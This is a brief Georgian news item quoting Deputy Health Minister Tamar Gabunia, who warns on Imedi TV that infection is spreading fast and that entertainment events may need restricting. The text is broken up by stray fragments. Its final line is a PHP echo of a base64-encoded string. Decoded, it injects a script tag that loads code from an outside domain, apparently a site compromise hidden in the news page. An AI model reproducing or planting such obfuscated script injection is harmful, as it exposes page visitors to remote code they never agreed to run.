celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის მოადგილის თამარ გაბუნიას განაცხადებით, ინფექცია სწრაფად ვრცელდება და აქტიური ჩარევის გარეშე ეს ტემპი კიდევ უფრო გაიზრდება. 
 
როგორც გაბუნიამ ტელეკომპანია "იმედის" ეთერში განაცხადა, გასართობი ღონისძიებების შეზღუდვა გახდება საჭირო და უწყება ამაზე უკვე მსჯელობს.
 
"ინდივიდუალური პასუხისმგებლობა კრიტიკულია და ამდენად, მოქალაქეებისა და საზოგადოების აქტიურობის გარეშე ეს წარმოუდგენელია. მესმის, ზაფხულია, კურორტები გაიხსნა, გასართობი ღონისძიებები ტარდება. გასართობ ღონისძიებაზე არ არის განწყობილი ადამიანი, რომ ნიღბით იყოს და დისტანცია დაიცვას, მაგრამ ასე არ გამოვა. ისევ მოგვიწევს გასართობი ღონისძიებების შეზღუდვაზე ვიმუშაოთ. ამაზე დავიწყეთ უკვე ფიქრი," - განაცხადა თამარ გაბუნიამ.
1605
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");